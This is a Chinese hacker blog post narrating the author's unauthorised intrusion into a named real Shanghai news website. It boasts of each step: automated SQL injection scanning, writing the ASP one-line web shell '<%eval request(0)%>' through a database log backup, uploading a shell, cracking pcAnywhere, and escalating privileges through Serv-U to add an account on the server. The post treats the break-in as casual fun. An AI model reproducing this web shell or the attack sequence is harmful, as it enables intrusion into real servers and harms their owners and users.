对上海新闻网站的检测..(全过程)

作者：a315278115
信息来源：安全叶子技术小组[J.Leaves Security Team]（http://www.00day.cn）


今天.出于无聊.想看下新闻.随便上网上搜索下.看到.
http://www.sh.chinanews.com.cn/


看起来貌似很牛B.所以就出于了检测的念头.
我直接用啊D直接扫出漏洞..(本人比较懒..懒的自己手工注入..)




直接log手工备份..刚刚开始..备份不成功..都过滤了~ - -1~~
极度郁闷..在此感谢落叶..提供了..“<%eval request(0)%>”一句话..
LOG备份成功..


直接上传拿SHELL...


  

连接了一下.没开3389..郁闷..


上传了CMD.查找下.还真没开.


于是看了下开了的服务..看到有有第三方软件.pcAnywhere..(天不"亡我"嘻嘻)


破解密码上去.郁闷.是连接上去了..没密码.怎么进呢..?




郁闷..看了下服务..发现有SU.


试下提权添加用户...


哈哈.成功添加用户..(RP爆发.嘻嘻.)


好了.连接上去.


进去服务器了..4核.4G..汗.还真是牛..